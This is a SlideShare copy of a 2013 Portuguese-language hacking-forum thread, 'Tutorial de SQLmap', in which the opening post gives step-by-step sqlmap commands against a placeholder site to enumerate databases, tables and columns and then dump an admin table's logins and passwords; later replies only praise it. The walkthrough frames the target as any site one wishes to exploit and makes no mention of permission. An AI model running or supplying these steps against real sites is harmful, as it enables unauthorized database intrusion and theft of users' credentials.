SlideShare ist ein Scribd-Unternehmen logo

Tutorial de sq lmap

R
Robson_Mendes
1 von 4
Downloaden Sie, um offline zu lesen
Search... OLÁ ROBMENDES Unread Replies Fórum The Anony Bay » T.A.B SECURITY » - Bugs & Exploits » Tutorial de SQLmap RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1] Tutorial de SQLmap « Online: 19-04-2013, 03:23:58 » CitarXiranha! S.Administrador Membro Participativo Mensagens: 123 144 credits View Inventory Send Money To Xiranha! Agradecimentos 202 "O medo só existe na mente dos Curtir Seja o primeiro de seus amigos a curtir isso. Oque é SQLmap ? Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel. Para ver os comandos, basta digitar Código: [Selecionar] python sqlmap.py -h Estudo Após você ter o site que deseja explorar, digite Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 --dbs --dbs é para descobrir a(s) database(s) que contem no site O resultado será mais ou menos assim: Código: [Selecionar] [ * ] database_do_site<br />[ * ] information_schema Após descobrir a(s) data base(s), digite Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site --tables « tópico anterior tópico seguinte » Autor Tópico: Tutorial de SQLmap (Lida 108 vezes) Início AjudaAjuda BuscaBusca Editar PerfilEditar Perfil Minhas MensagensMinhas Mensagens Today's PostsToday's Posts ShopShop MembrosMembros SairSair TweetTweet 0 0
Fracos" --tables é para descobrir as tabelas que tem dentro da database O resultado será mais ou menos assim: Código: [Selecionar] +---------------+<br />| admin |<br />| publicidade |<br />| teste |<br />+---------- Após descobrir as tabelas, digite : Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin --columns --columns é para descobrir as colunas que tem dentro da tabela escolhida O resultado será mais ou menos assim : Código: [Selecionar] +--------+--------------+<br />| Column | Type |<br />+--------+--------------+<br />| ID | in Após descobrir as colunas, digite : Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin -C 'login,s --dump é para extrair os dados do site. mas não é qualquer dado, tem que estar dentro da coluna escolhida, e você tem que escolher o que extrair da coluna, no caso eu extrai os logins e senhas que estão salvo dentro da coluna De uma forma, os logins e senhas vão aparecer na própria shell, mas também ira ser extraída, para um arquivo dentro da pasta /pentest/database/sqlmap/output/sitedesejado.com.br/dump/database_do_site/admin.csv Reportar ao moderador Registrado "não Clique" Re:Tutorial de SQLmap « Resposta #1 Online: 19-04-2013, 06:30:43 » CitarPseudônimo Administrador Membro Expert Curtir Seja o primeiro de seus amigos a curtir isso. Eita Rafa, obrigado pelo ótimo tutorial. Parabéns. TweetTweet 0 0
Mensagens: 293 202 credits View Inventory Send Money To Pseudônimo Agradecimentos 46 Reportar ao moderador Registrado Re:Tutorial de SQLmap « Resposta #2 Online: 28-04-2013, 14:30:36 » Citarpnp Novato Mensagens: 11 90 credits View Inventory Send Money To pnp Agradecimentos 0 Curtir Seja o primeiro de seus amigos a curtir isso. ótimo Tutorial. Reportar ao moderador Registrado Re:Tutorial de SQLmap « Resposta #3 Online: 25-06-2013, 00:10:53 » CitarWhisper Membro Participativo Mensagens: 66 Curtir Seja o primeiro de seus amigos a curtir isso. muito bom mesmo.. vlw.. Reportar ao moderador Registrado TweetTweet 0 0 TweetTweet 0 0
428 credits View Inventory Send Money To Whisper Agradecimentos 2 Re:Tutorial de SQLmap « Resposta #4 Online: 25-06-2013, 09:42:40 » CitarTh3Jok3rG4m3r Na terra dos assassinos a mente de um pecador é santuário. Moderador Expert Membro Expert Mensagens: 340 2752 credits View Inventory Send Money To Th3Jok3rG4m3r Agradecimentos 65 É, Eu sou um tanto quanto ESTRANHO! Shhh Vá Dormir Curtir Seja o primeiro de seus amigos a curtir isso. Bem interessante Rafa, parabéns pelo tutorial Reportar ao moderador Registrado "Se RAP fosse coisa de bandido,muitos dos políticos seriam os MC's. ¯_(ツ)_/¯ " RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1] Fórum The Anony Bay » T.A.B SECURITY » - Bugs & Exploits » Tutorial de SQLmap Resposta Rápida « tópico anterior tópico seguinte » Ir para: => - Bugs & Exploits OK TweetTweet 0 0 SMF 2.0.4 | SMF © 2013, Simple Machines SMFAds for Free Forums Fórum The Anony Bay by Host By : TheHostBay

Empfohlen

Protege o teu site WordPress
Protege o teu site WordPressProtege o teu site WordPress
Protege o teu site WordPress
Ricardo Castelhano
 
Análise de malware com software livre
Análise de malware com software livreAnálise de malware com software livre
Análise de malware com software livre
Diego Santos
 
Performance Tuning de Clusters Plone - PyConBrasil 2 (2006)
Performance Tuning de Clusters Plone - PyConBrasil 2 (2006)Performance Tuning de Clusters Plone - PyConBrasil 2 (2006)
Performance Tuning de Clusters Plone - PyConBrasil 2 (2006)
Fabiano Weimar
 
Circuito_Openldap_Avançado
Circuito_Openldap_AvançadoCircuito_Openldap_Avançado
Circuito_Openldap_Avançado
Marcio Garcia
 
Arquitetura de Memoria do PostgreSQL
Arquitetura de Memoria do PostgreSQLArquitetura de Memoria do PostgreSQL
Arquitetura de Memoria do PostgreSQL
Raul Oliveira
 
Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univem
evandrovv
 
Segurança em Aplicativos Web
Segurança em Aplicativos WebSegurança em Aplicativos Web
Segurança em Aplicativos Web
Sergio Henrique
 
Teste de segurança do lado servidor - Nível 1
Teste de segurança do lado servidor - Nível 1Teste de segurança do lado servidor - Nível 1
Teste de segurança do lado servidor - Nível 1
Kleitor Franklint Correa Araujo
 

Empfohlen

Protege o teu site WordPress
Protege o teu site WordPressProtege o teu site WordPress
Protege o teu site WordPress
Ricardo Castelhano
 
Análise de malware com software livre
Análise de malware com software livreAnálise de malware com software livre
Análise de malware com software livre
Diego Santos
 
Performance Tuning de Clusters Plone - PyConBrasil 2 (2006)
Performance Tuning de Clusters Plone - PyConBrasil 2 (2006)Performance Tuning de Clusters Plone - PyConBrasil 2 (2006)
Performance Tuning de Clusters Plone - PyConBrasil 2 (2006)
Fabiano Weimar
 
Circuito_Openldap_Avançado
Circuito_Openldap_AvançadoCircuito_Openldap_Avançado
Circuito_Openldap_Avançado
Marcio Garcia
 
Arquitetura de Memoria do PostgreSQL
Arquitetura de Memoria do PostgreSQLArquitetura de Memoria do PostgreSQL
Arquitetura de Memoria do PostgreSQL
Raul Oliveira
 
Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univem
evandrovv
 
Segurança em Aplicativos Web
Segurança em Aplicativos WebSegurança em Aplicativos Web
Segurança em Aplicativos Web
Sergio Henrique
 
Teste de segurança do lado servidor - Nível 1
Teste de segurança do lado servidor - Nível 1Teste de segurança do lado servidor - Nível 1
Teste de segurança do lado servidor - Nível 1
Kleitor Franklint Correa Araujo
 
Monitorando os Recursos e Processos do Servidor, através do Power BI
Monitorando os Recursos e Processos do Servidor, através do Power BIMonitorando os Recursos e Processos do Servidor, através do Power BI
Monitorando os Recursos e Processos do Servidor, através do Power BI
Sulamita Dantas
 
Treinamento DBA Essential
Treinamento DBA EssentialTreinamento DBA Essential
Treinamento DBA Essential
Douglas Paiva de Sousa
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
Roberto Castro
 
Machine learning java ce conference 2012 - fortaleza ce
Machine learning java ce conference 2012 - fortaleza ceMachine learning java ce conference 2012 - fortaleza ce
Machine learning java ce conference 2012 - fortaleza ce
Luca Bastos
 
Automatizando tarefas com Python
Automatizando tarefas com PythonAutomatizando tarefas com Python
Automatizando tarefas com Python
pugpe
 
Invasão e Segurança
Invasão e SegurançaInvasão e Segurança
Invasão e Segurança
Carlos Henrique Martins da Silva
 
Web App Flaws - SQL Injection
Web App Flaws - SQL InjectionWeb App Flaws - SQL Injection
Web App Flaws - SQL Injection
David Gomes Guimarães
 
1º Meetup Zabbix Meetup do Recife: Francys Nivea - LLD ODBC
1º Meetup Zabbix Meetup do Recife: Francys Nivea - LLD ODBC1º Meetup Zabbix Meetup do Recife: Francys Nivea - LLD ODBC
1º Meetup Zabbix Meetup do Recife: Francys Nivea - LLD ODBC
Zabbix BR
 
Identifique brechas, proteja sua aplicação | Php avenger e octopus
Identifique brechas, proteja sua aplicação | Php avenger e octopusIdentifique brechas, proteja sua aplicação | Php avenger e octopus
Identifique brechas, proteja sua aplicação | Php avenger e octopus
Leonn Leite
 
Excelsior - Perfil usando Big Data e Web Semântica
Excelsior - Perfil usando Big Data e Web SemânticaExcelsior - Perfil usando Big Data e Web Semântica
Excelsior - Perfil usando Big Data e Web Semântica
Renan Moreira de Oliveira
 
Manobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
Manobras Evasivas: Técnicas de Evasão para Varreduras com o NmapManobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
Manobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
Clavis Segurança da Informação
 
Ransomware
RansomwareRansomware
Ransomware
Flavio Shiga
 
Melhorando o desempenho de sua maquina pelo regedit
Melhorando o desempenho de sua maquina pelo regeditMelhorando o desempenho de sua maquina pelo regedit
Melhorando o desempenho de sua maquina pelo regedit
Resistencia Brasilsul
 
Curso Linguagem de Programação I - PHP Básico
Curso Linguagem de Programação I - PHP BásicoCurso Linguagem de Programação I - PHP Básico
Curso Linguagem de Programação I - PHP Básico
Norton Guimarães
 

Weitere ähnliche Inhalte

Ähnlich wie Tutorial de sq lmap

Automatizando tarefas com Python
Automatizando tarefas com PythonAutomatizando tarefas com Python
Automatizando tarefas com Python
pugpe
 
Melhorando o desempenho de sua maquina pelo regedit
Melhorando o desempenho de sua maquina pelo regeditMelhorando o desempenho de sua maquina pelo regedit
Melhorando o desempenho de sua maquina pelo regedit
Resistencia Brasilsul
 

Ähnlich wie Tutorial de sq lmap (14)

Monitorando os Recursos e Processos do Servidor, através do Power BI
Monitorando os Recursos e Processos do Servidor, através do Power BIMonitorando os Recursos e Processos do Servidor, através do Power BI
Monitorando os Recursos e Processos do Servidor, através do Power BI
 
Treinamento DBA Essential
Treinamento DBA EssentialTreinamento DBA Essential
Treinamento DBA Essential
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 
Machine learning java ce conference 2012 - fortaleza ce
Machine learning java ce conference 2012 - fortaleza ceMachine learning java ce conference 2012 - fortaleza ce
Machine learning java ce conference 2012 - fortaleza ce
 
Automatizando tarefas com Python
Automatizando tarefas com PythonAutomatizando tarefas com Python
Automatizando tarefas com Python
 
Invasão e Segurança
Invasão e SegurançaInvasão e Segurança
Invasão e Segurança
 
Web App Flaws - SQL Injection
Web App Flaws - SQL InjectionWeb App Flaws - SQL Injection
Web App Flaws - SQL Injection
 
1º Meetup Zabbix Meetup do Recife: Francys Nivea - LLD ODBC
1º Meetup Zabbix Meetup do Recife: Francys Nivea - LLD ODBC1º Meetup Zabbix Meetup do Recife: Francys Nivea - LLD ODBC
1º Meetup Zabbix Meetup do Recife: Francys Nivea - LLD ODBC
 
Identifique brechas, proteja sua aplicação | Php avenger e octopus
Identifique brechas, proteja sua aplicação | Php avenger e octopusIdentifique brechas, proteja sua aplicação | Php avenger e octopus
Identifique brechas, proteja sua aplicação | Php avenger e octopus
 
Excelsior - Perfil usando Big Data e Web Semântica
Excelsior - Perfil usando Big Data e Web SemânticaExcelsior - Perfil usando Big Data e Web Semântica
Excelsior - Perfil usando Big Data e Web Semântica
 
Manobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
Manobras Evasivas: Técnicas de Evasão para Varreduras com o NmapManobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
Manobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
 
Ransomware
RansomwareRansomware
Ransomware
 
Melhorando o desempenho de sua maquina pelo regedit
Melhorando o desempenho de sua maquina pelo regeditMelhorando o desempenho de sua maquina pelo regedit
Melhorando o desempenho de sua maquina pelo regedit
 
Curso Linguagem de Programação I - PHP Básico
Curso Linguagem de Programação I - PHP BásicoCurso Linguagem de Programação I - PHP Básico
Curso Linguagem de Programação I - PHP Básico
 

Tutorial de sq lmap

  • 1. Search... OLÁ ROBMENDES Unread Replies Fórum The Anony Bay » T.A.B SECURITY » - Bugs & Exploits » Tutorial de SQLmap RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1] Tutorial de SQLmap « Online: 19-04-2013, 03:23:58 » CitarXiranha! S.Administrador Membro Participativo Mensagens: 123 144 credits View Inventory Send Money To Xiranha! Agradecimentos 202 "O medo só existe na mente dos Curtir Seja o primeiro de seus amigos a curtir isso. Oque é SQLmap ? Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel. Para ver os comandos, basta digitar Código: [Selecionar] python sqlmap.py -h Estudo Após você ter o site que deseja explorar, digite Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 --dbs --dbs é para descobrir a(s) database(s) que contem no site O resultado será mais ou menos assim: Código: [Selecionar] [ * ] database_do_site<br />[ * ] information_schema Após descobrir a(s) data base(s), digite Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site --tables « tópico anterior tópico seguinte » Autor Tópico: Tutorial de SQLmap (Lida 108 vezes) Início AjudaAjuda BuscaBusca Editar PerfilEditar Perfil Minhas MensagensMinhas Mensagens Today's PostsToday's Posts ShopShop MembrosMembros SairSair TweetTweet 0 0
  • 2. Fracos" --tables é para descobrir as tabelas que tem dentro da database O resultado será mais ou menos assim: Código: [Selecionar] +---------------+<br />| admin |<br />| publicidade |<br />| teste |<br />+---------- Após descobrir as tabelas, digite : Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin --columns --columns é para descobrir as colunas que tem dentro da tabela escolhida O resultado será mais ou menos assim : Código: [Selecionar] +--------+--------------+<br />| Column | Type |<br />+--------+--------------+<br />| ID | in Após descobrir as colunas, digite : Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin -C 'login,s --dump é para extrair os dados do site. mas não é qualquer dado, tem que estar dentro da coluna escolhida, e você tem que escolher o que extrair da coluna, no caso eu extrai os logins e senhas que estão salvo dentro da coluna De uma forma, os logins e senhas vão aparecer na própria shell, mas também ira ser extraída, para um arquivo dentro da pasta /pentest/database/sqlmap/output/sitedesejado.com.br/dump/database_do_site/admin.csv Reportar ao moderador Registrado "não Clique" Re:Tutorial de SQLmap « Resposta #1 Online: 19-04-2013, 06:30:43 » CitarPseudônimo Administrador Membro Expert Curtir Seja o primeiro de seus amigos a curtir isso. Eita Rafa, obrigado pelo ótimo tutorial. Parabéns. TweetTweet 0 0
  • 3. Mensagens: 293 202 credits View Inventory Send Money To Pseudônimo Agradecimentos 46 Reportar ao moderador Registrado Re:Tutorial de SQLmap « Resposta #2 Online: 28-04-2013, 14:30:36 » Citarpnp Novato Mensagens: 11 90 credits View Inventory Send Money To pnp Agradecimentos 0 Curtir Seja o primeiro de seus amigos a curtir isso. ótimo Tutorial. Reportar ao moderador Registrado Re:Tutorial de SQLmap « Resposta #3 Online: 25-06-2013, 00:10:53 » CitarWhisper Membro Participativo Mensagens: 66 Curtir Seja o primeiro de seus amigos a curtir isso. muito bom mesmo.. vlw.. Reportar ao moderador Registrado TweetTweet 0 0 TweetTweet 0 0
  • 4. 428 credits View Inventory Send Money To Whisper Agradecimentos 2 Re:Tutorial de SQLmap « Resposta #4 Online: 25-06-2013, 09:42:40 » CitarTh3Jok3rG4m3r Na terra dos assassinos a mente de um pecador é santuário. Moderador Expert Membro Expert Mensagens: 340 2752 credits View Inventory Send Money To Th3Jok3rG4m3r Agradecimentos 65 É, Eu sou um tanto quanto ESTRANHO! Shhh Vá Dormir Curtir Seja o primeiro de seus amigos a curtir isso. Bem interessante Rafa, parabéns pelo tutorial Reportar ao moderador Registrado "Se RAP fosse coisa de bandido,muitos dos políticos seriam os MC's. ¯_(ツ)_/¯ " RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1] Fórum The Anony Bay » T.A.B SECURITY » - Bugs & Exploits » Tutorial de SQLmap Resposta Rápida « tópico anterior tópico seguinte » Ir para: => - Bugs & Exploits OK TweetTweet 0 0 SMF 2.0.4 | SMF © 2013, Simple Machines SMFAds for Free Forums Fórum The Anony Bay by Host By : TheHostBay